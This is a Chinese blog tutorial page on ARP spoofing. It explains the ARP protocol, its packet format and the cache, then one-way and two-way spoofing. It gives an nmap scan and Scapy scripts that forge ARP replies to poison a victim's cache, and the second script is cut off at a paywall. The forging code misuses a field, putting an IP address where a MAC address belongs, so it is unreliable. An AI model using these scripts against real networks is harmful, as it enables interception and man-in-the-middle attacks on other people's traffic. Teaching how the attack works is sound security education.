ARP欺骗技术:DNS欺骗与HTTP重定向_(2).ARP欺骗原理与机制

ARP欺骗原理、实现与防御全解析
最新推荐文章于 2024-11-14 22:45:28 发布
原创 最新推荐文章于 2024-11-14 22:45:28 发布 · 1.6k 阅读 · 25 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#http #网络 #php #ARP欺骗技术 #网络协议 #开发语言

ARP欺骗原理与机制

1. ARP协议简介

ARP(Address Resolution Protocol)协议是用于将IP地址解析为物理地址(通常是MAC地址)的协议。在网络中,计算机之间进行通信时,需要知道对方的MAC地址来构建数据帧。ARP协议通过广播请求和单播响应的方式,实现了从IP地址到MAC地址的动态映射。ARP协议在RFC 826中定义,主要用于IPv4网络。

在这里插入图片描述

1.1 ARP协议的工作流程

  1. ARP请求:当一台主机需要发送数据给另一台主机时,如果目标主机的MAC地址不在其ARP缓存中,它会发送一个ARP请求广播。这个广播包中包含目标主机的IP地址,请求所有主机响应目标主机的MAC地址。

  2. ARP响应:收到ARP请求的主机如果发现自己拥有请求中的IP地址,会发送一个ARP响应单播包。这个响应包中包含自己的MAC地址,发送给请求主机。

  3. ARP缓存更新:请求主机收到ARP响应后,会将目标主机的IP地址和MAC地址的映射关系更新到自己的ARP缓存中,以便后续通信时直接使用。

1.2 ARP协议的数据包格式

ARP协议的数据包格式如下:

| 字段 | 长度(字节) | 描述 |

|----------------|--------------|--------------------------------|

| 硬件类型 | 2 | 指定硬件地址类型,1表示以太网 |

| 协议类型 | 2 | 指定协议地址类型,0x0800表示IPv4 |

| 硬件地址长度 | 1 | 硬件地址的长度,6表示以太网MAC地址 |

| 协议地址长度 | 1 | 协议地址的长度,4表示IPv4地址 |

| 操作码 | 2 | 指定操作类型,1表示请求,2表示响应 |

| 发送方硬件地址 | 6 | 发送方的MAC地址 |

| 发送方协议地址 | 4 | 发送方的IP地址 |

| 目标硬件地址 | 6 | 目标方的MAC地址 |

| 目标协议地址 | 4 | 目标方的IP地址 |

1.3 ARP缓存

ARP缓存是存储IP地址和MAC地址映射关系的临时存储区域。每个主机都有自己的ARP缓存,用于快速查找目标主机的MAC地址。ARP缓存中的条目通常有生存时间(TTL),以防止缓存条目长时间不更新导致错误通信。

2. ARP欺骗的基本原理

ARP欺骗是一种网络攻击技术,攻击者通过伪造ARP响应包,使受害主机将攻击者的MAC地址与目标主机的IP地址绑定,从而截获或篡改受害主机与目标主机之间的通信。ARP欺骗可以分为两种主要类型:单向欺骗和双向欺骗。

2.1 单向欺骗

单向欺骗是指攻击者将自己伪装成目标主机,使受害主机将所有发往目标主机的数据包都发送给攻击者。攻击者可以选择转发这些数据包,或者直接丢弃,从而实现数据截获或拒绝服务攻击。

2.2 双向欺骗

双向欺骗是指攻击者同时将自己伪装成受害主机和目标主机,使两者的通信都经过攻击者。这种情况下,攻击者可以完全控制两者的通信,实现中间人攻击(Man-in-the-Middle, MITM)。

3. ARP欺骗的实现步骤

3.1 确定目标主机

首先,攻击者需要确定目标主机的IP地址和MAC地址。这可以通过网络扫描工具(如Nmap)来实现。


# 使用Nmap扫描网络中的主机

nmap -sn 192.168.1.0/24

3.2 伪造ARP响应包

攻击者使用工具(如Scapy)来伪造ARP响应包。伪造的ARP响应包中,攻击者的MAC地址被绑定到目标主机的IP地址上。


from scapy.all import *



# 定义目标主机和受害主机的IP地址和MAC地址

target_ip = "192.168.1.2"

victim_ip = "192.168.1.3"

attacker_mac = "00:11:22:33:44:55"



# 伪造ARP响应包

arp_response = ARP(op=2, psrc=target_ip, pdst=victim_ip, hwdst=victim_ip, hwsrc=attacker_mac)



# 发送伪造的ARP响应包

send(arp_response)

3.3 更新ARP缓存

受害主机收到伪造的ARP响应包后,会更新其ARP缓存,将目标主机的IP地址绑定到攻击者的MAC地址上。这样,所有发往目标主机的数据包都会被发送到攻击者。

3.4 维持欺骗

为了维持欺骗,攻击者需要定期发送伪造的ARP响应包,以防止受害主机的ARP缓存条目过期。


from scapy.all import *

import time



# 定义目标主机和受害主机的IP地址和MAC地址

target_ip = "192.168.1.2"

victim_ip = "192.168.1.3"

attacker_mac = "00:11:22:33:44:55"



# 伪造ARP响应包

arp_response = ARP(op=2, psrc=target_ip
最低0.47元/天 解锁文章
网络安全之 ARP 欺骗防护
zxcvbnmasdflzl的博客
12-14 1815
MAC 地址是固化在网卡上的网络标识,由 Ieee802 标准规定。向同一个网段内的设备,发送数据包,广播 IP 地址是同网段最后一个 IP 地址。
ARP欺骗技术DNS欺骗HTTP重定向_(6).DNS欺骗原理机制
chenlz2007的博客
11-14 1236
DNS协议是一种基于UDP的协议,主要工作在应用层。DNS的主要功能是将易于记忆的域名转换为网络设备所需的IP地址。递归查询:客户端向本地DNS服务器发起查询请求,本地DNS服务器负责递归查询,直到找到正确的IP地址。迭代查询:DNS服务器向其他DNS服务器发起查询请求,获取相关信息。缓存:DNS服务器将查询结果缓存一段时间,以提高后续查询的效率。
IP源地址欺骗攻击研究实践
2301_80058039的博客
05-15 1887
IP源地址欺骗攻击是指行动产生的IP数据包伪造的源IP地址,以便冒充其他系统或保护发件人的身份。IP源地址欺骗攻击也可以是指伪造或使用伪造的标题,以电子邮件或网络新闻等,以再次保护发件人的身份来误导接收器或网络,进而假冒其他计算机,用来掩盖其欺骗攻击的目的。
ARP欺骗
cyy001128的博客
10-16 5571
ARP 欺骗ARP spoofing)是一种网络攻击技术,通过发送伪造好的 ARP 数据包,伪装成网关使被攻击者误以为攻击者是其网关或其它设备,从而达到欺骗目标设备的目的。这样,攻击者就可以截获查看被攻击者发出的数据包,甚至可以修改、篡改数据包中的内容。arp欺骗最主要的目的是截获数据ARP欺骗攻击能导致网络连通性问题。注:网关并不是指具体的设备,路由器,计算机终端等各种各样的设备都可以是⽹关,⽹关就是数据必须经过的关⼝。
arp欺骗
奇葩
01-20 1352
这篇文章讲的是通过arp欺骗来达到如何获取靶机的数据包和挟持靶机的dns协议。也就是为什么我们不能够在公共场合连接WiFi(这里只是讲了一个点),值得注意的是,这里的靶机,我就是没有做任何改动,直接连进WiFi 准备 需要的设备很简单 设备 vmware kali虚拟机 条件 靶机和windows 处于同一wifi下windows机子 和kali之间采用网桥模式 以上就是做这个实验的前提条件 ...
ARP欺骗技术DNS欺骗HTTP重定向.docxARP欺骗技术DNS欺骗HTTP重定向all.docxARP欺骗技术DNS欺骗HTTP重定向-(10).HTTP重定向原理机制.doc
08-31
ARP欺骗技术DNS欺骗HTTP重定向.docx ARP欺骗技术DNS欺骗HTTP重定向all.docx ARP欺骗技术DNS欺骗HTTP重定向_(10).HTTP重定向原理...ARP欺骗技术DNS欺骗HTTP重定向_(2.ARP欺骗原理机制.docx AR
ARP欺骗技术DNS欺骗HTTP重定向_(13).ARP欺骗DNS欺骗结合攻击
最新发布
chenlz2007的博客
11-14 873
ARP协议用于将IP地址解析为物理(MAC)地址。在网络中,每个设备都有一个唯一的MAC地址,而IP地址则是用于网络层通信的地址。当一个设备需要另一个设备通信时,它会发送一个ARP请求,询问目标IP地址对应的MAC地址。目标设备收到请求后,会发送一个ARP响应,告知自己的MAC地址。DNS(Domain Name System)协议用于将域名解析为IP地址。当用户访问一个网站时,浏览器会向DNS服务器发送查询请求,DNS服务器会返回相应的IP地址。ettercap。
ARP欺骗技术DNS欺骗HTTP重定向_(11).HTTP重定向的攻击方法
chenlz2007的博客
11-14 903
HTTP重定向是通过HTTP响应中的状态码和重定向URL来实现的。当用户访问一个网站时,攻击者可以通过中间人攻击(Man-in-the-Middle, MITM)篡改HTTP响应,将用户重定向到攻击者控制的恶意网站。HTTP重定向是一种网络攻击技术,通过操纵HTTP请求和响应,将用户从合法网站重定向到攻击者控制的恶意网站。:在实际环境中,未经授权的ARP欺骗HTTP重定向攻击是非法的,可能会导致法律责任。:攻击者在监听到HTTP请求后,篡改服务器返回的HTTP响应,插入重定向状态码和恶意URL。
kali Linux 渗透测试 | ARP 欺骗
专注于C/C++/Linux领域创作
01-30 4792
目录 ARP 欺骗及其原理 ARP 欺骗实施步骤 必备工具安装 nmap 工具 dsniff 工具 driftnet 工具 ettercap 工具 ARP 欺骗测试 ARP 断网攻击 ARP 欺骗(不断网) 抓取图片 获取账号密码 arp 缓存表对照 ARP协议: 地址解析协议,即ARP(Address Resoluti...
ARP欺骗(详解)
qq_70584783的博客
06-13 1082
ARP欺骗ARP spoofing),也称为ARP毒化或ARP攻击,是一种针对以太网地址解析协议(ARP)的恶意技术。该攻击手法主要发生在局域网(LAN)环境中,其目的是通过篡改网络设备上的ARP缓存表,来误导数据包的流向,从而实现对网络通信的控制、窃听或阻断。
网络攻防实战--ARP欺骗
热门推荐
vaeloverforever的博客
11-26 5万+
二、实验环境(实验设备) 硬件:微型计算机 软件: kali linux下的arpspoof工具和driftnet工具   三、实验原理及内容以及实验小结 ㈠ ARP欺骗 ⑴利用arpspoof工具和driftnet工具的arp欺骗实验 ①实验原理     1.ARP协议:ARP(Address Resolution Protocol,地址解析协议)是一个位于TCP/IP协议栈中的...
我眼中的ARP欺骗
ovowovo的博客
10-09 266
ARP全称为Address Resolution Protocol,即地址解析协议。是根据IP地址获取物理地址的一个TCP/IP协议。主机发送信息时将包含目标IP地址的ARP请求广播到网络上的所有主机,并接收返回消息,以此确定目标的物理地址;收到返回消息后将该IP地址和物理地址存入本 机ARP缓存中并保留一定时间,下次请求时直接查询ARP缓存以节约资源。地址解析协议是建立在网络中各个主机互相信任的基础上的,网络上的主机可以自主 发送ARP应答消息,其他主机收到应答报文时不会检测该报文的真实性就会将其记入本机
网络攻击手段之-----ARP欺骗
qq_53058639的博客
01-29 2929
本篇文章介绍了什么是ARP欺骗,并使用了代码来模拟ARP欺骗攻击,ARP 欺骗攻击是一种高危网络攻击,对网络安全造成严重威胁。因此,不应该对任何目标进行ARP 欺骗攻击。做一个遵纪守法的公民,从我做起!!!ARP (Address Resolution Protocol) 是一种网络层协议,用于将 IP 地址转换为物理地址(MAC地址)。在局域网中,每台设备都有唯一的 MAC 地址,而 IP 地址是可以重复分配的。因此,当一个设备需要发送数据到另一个设备时,它需要知道另一个设备的MAC 地址。
arp欺骗详解
banliyaoguai的博客
04-30 2794
当一台设备在局域网中想要另外一台设备进行通信,设备双方需要知道对方的MAC地址,如何获取对方的MAC地址就需要用到arp协议。下面用例子来解释一下:在同一广播域中,已知某一台设备的IP,不知MAC。假设a传消息给b,a已知b的IP,不知b的MAC。a会发送一个arp请求包,在同一个广播域的设备都会收到这个这个请求包,这时arp请求包的mac为全F,同时这个广播域的设备会将刚刚发来消息的设备a的IP和MAC的对应关系记录下来,但是不做其他操作。
什么是ARP欺骗
jasonj333
05-05 1万+
ARP欺骗的本质是把虚假的IP-MAC映射关系通过ARP报文发给主机,让主机把虚假的IP-MAC映射存入ARP缓存表(可能是IP地址错误,也可能是MAC地址错误),让其无法正确发送数据 漏洞的根源 ARP协议是无连接 操作系统收到ARP请求或响应后无法确认senderMAC和senderIP真假 ARP欺骗 伪造网关 攻击者B伪造ARP报文(senderIP地址是网关的,senderMAC地址不是网关的),发送给网段内的主机A,那么主机A就会把网关的ip地址和伪造的mac地址缓存到arp.
ARP欺骗-教程详解
wzhua的博客
08-09 8787
ARP欺骗-教程详解,有链接,步骤
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值